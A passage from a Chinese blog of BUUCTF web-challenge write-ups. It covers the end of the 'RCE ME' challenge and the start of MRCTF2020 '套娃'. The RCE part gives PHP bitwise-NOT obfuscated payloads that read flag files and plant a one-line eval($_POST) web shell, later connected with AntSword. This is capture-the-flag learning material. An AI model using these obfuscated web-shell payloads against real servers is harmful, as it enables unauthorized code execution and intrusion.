class="string">&quot;/&quot;</span>)));</span><br></pre></td></tr></table></figure>

<p>之后使用readfile读：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo urlencode(~&#x27;readfile&#x27;);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">//%8D%9A%9E%9B%99%96%93%9A</span><br><span class="line"></span><br><span class="line">payload:</span><br><span class="line">flag:(~%8D%9A%9E%9B%99%96%93%9A)((~%D0%99%93%9E%98));</span><br><span class="line">readflag:(~%8D%9A%9E%9B%99%96%93%9A)((~%D0%8D%9A%9E%9B%99%93%9E%98));</span><br></pre></td></tr></table></figure>

<p>flag是空的，readflag是elf文件：</p>
<p><img src="/2021/09/16/BUU-WEB-0x30-0x3F/image-20220405234450364.png" alt="image-20220405234450364"></p>
<p>传一句话马：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span>=<span class="string">&#x27;assert&#x27;</span>;</span><br><span class="line"><span class="variable">$b</span>=urlencode(~<span class="variable">$a</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$b</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="variable">$c</span>=<span class="string">&#x27;(eval($_POST[&quot;test&quot;]))&#x27;</span>;</span><br><span class="line"><span class="variable">$d</span>=urlencode(~<span class="variable">$c</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$d</span>;</span><br><span class="line"> </span><br><span class="line"> <span class="meta">?&gt;</span></span><br><span class="line">?code=(~%<span class="number">9</span>E%<span class="number">8</span>C%<span class="number">8</span>C%<span class="number">9</span>A%<span class="number">8</span>D%<span class="number">8</span>B)(~%D7%<span class="number">9</span>A%<span class="number">89</span>%<span class="number">9</span>E%<span class="number">93</span>%D7%DB%A0%AF%B0%AC%AB%A4%DD%<span class="number">8</span>B%<span class="number">9</span>A%<span class="number">8</span>C%<span class="number">8</span>B%DD%A2%D6%D6);</span><br></pre></td></tr></table></figure>

<p>蚁剑连之后并没有权限，有这样一个插件</p>
<p><img src="/2021/09/16/BUU-WEB-0x30-0x3F/image-20220405235340391.png" alt="image-20220405235340391"></p>
<p><img src="/2021/09/16/BUU-WEB-0x30-0x3F/image-20220405235406928.png" alt="image-20220405235406928"></p>
<p>之后就可以运行readflag了。</p>
<h1 id="0x3F-MRCTF2020-套娃"><a href="#0x3F-MRCTF2020-套娃" class="headerlink" title="0x3F.[MRCTF2020]套娃"></a>0x3F.[MRCTF2020]套娃</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="variable">$query</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>];</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>( substr_count(<span class="variable">$query</span>, <span class="string">&#x27;_&#x27;</span>) !== <span class="number">0</span> || substr_count(<span class="variable">$query</span>, <span class="string">&#x27;%5f&#x27;</span>) != <span class="number">0</span> )&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;Y0u are So cutE!&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;b_u_p_t&#x27;</span>] !== <span class="string">&#x27;23333&#x27;</span> &amp;&amp; preg_match(<span class="string">&#x27;/^23333$/&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;b_u_p_t&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;you are going to the next ~&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


                                                                    </div>
                                                                    
                                                                        <div class="prev-or-next">
                                                                            <div class="post-foot-next">
                                                                                
                                                                                    <a href="/2021/09/12/BUU-WEB-0x20-0x2F/" target="_self">
                                                                                        <i class="iconfont icon-chevronleft"></i>
                                                                                        <span>Prev</span>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                            <div class="post-attach">
                                                                                <!-- <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-09-16
            </span> -->

                                                                                
                                                                                            <span class="post-categories">
          <!-- <i class="iconfont icon-bookmark" title="Categories"></i> -->
          
          <!-- <span class="span--category">
            <a href="/categories/Technology/" title="Technology">
              <b>#</b> Technology
            </a>
          </span> -->
                                                                                            
                                                                                                </span>
                                                                                                
                                                                                    <span class="post-tags">
          <!-- <i class="iconfont icon-tags" title="Tags"></i> -->
          
          <!-- <span class="span--tag">
            <a href="/tags/WEB/" title="WEB">
              <b>#</b> WEB
            </a>
          </span> -->
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            </div>
                                                                            <div class="post-foot-prev">
                                                                                
                                                                                    <a href="/2021/09/24/IO_FILE/" target="_self">
                                                                                        <span>Next</span>
                                                                                        <i class="iconfont icon-chevronright"></i>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                        </div>
                                                                        
                                                                </div>
                                                                
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x30-WUSTCTF2020-%E6%9C%B4%E5%AE%9E%E6%97%A0%E5%8D%8E-%E5%AE%A1%E8%AE%A1"><span class="toc-text">0x30.[WUSTCTF2020]朴实无华(审计)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x31-WesternCTF2018-shrine-SSTI"><span class="toc-text">0x31.[WesternCTF2018]shrine(SSTI)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x32-SWPU2019-Web1-%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5"><span class="toc-text">0x32.[SWPU2019]Web1(无列名注入)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x33-%E7%BD%91%E9%BC%8E%E6%9D%AF-2020-%E6%9C%B1%E9%9B%80%E7%BB%84-Nmap"><span class="toc-text">0x33.[网鼎杯 2020 朱雀组]Nmap</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x34-SUCTF-2019-Pythonginx"><span class="toc-text">0x34.[SUCTF 2019]Pythonginx</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x35-MRCTF2020-PYWebsite"><span class="toc-text">0x35.[MRCTF2020]PYWebsite</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x36-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-FinalSQL-%E7%9B%B2%E6%B3%A8"><span class="toc-text">0x36.[极客大挑战 2019]FinalSQL(盲注)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x37-MRCTF2020-Ezpop"><span class="toc-text">0x37.[MRCTF2020]Ezpop</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x38-NPUCTF2020-ReadlezPHP"><span class="toc-text">0x38.[NPUCTF2020]ReadlezPHP</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x39-CISCN2019-%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA-Web11-SSTI"><span class="toc-text">0x39.[CISCN2019 华东南赛区]Web11(SSTI)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x3A-BJDCTF2020-EasySearch"><span class="toc-text">0x3A.[BJDCTF2020]EasySearch</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x3B-BSidesCF-2019-Futurella"><span class="toc-text">0x3B.[BSidesCF 2019]Futurella</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x3C-GYCTF2020-FlaskApp"><span class="toc-text">0x3C.[GYCTF2020]FlaskApp</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x3D-BSidesCF-2019-Kookie"><span class="toc-text">0x3D.[BSidesCF 2019]Kookie</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x3E-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-RCE-ME"><span class="toc-text">0x3E.[极客大挑战 2019]RCE ME</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x3F-MRCTF2020-%E5%A5%97%E5%A8%83"><span class="toc-text">0x3F.[MRCTF2020]套娃</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




                                                                    
                                                                        <div class="comments-container">
                                                                            







                                                                        </div>
                                                                        
                                                            </div>
                                                            
        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Ghostasky">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" target="_blank" rel="noopener" href="https://twitter.com/ghostasky">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Ghostasky">怕什么真理无穷，进一寸有进一寸的欢喜。</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + BUU_WEB%E5%88%B7%E9%A2%98_0x30-0x3F + '&url=' + https%3A%2F%2Fghostasky.github.io%2F2021%2F09%2F16%2FBUU-WEB-0x30-0x3F%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://ghostasky.github.io/2021/09/16/BUU-WEB-0x30-0x3F/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
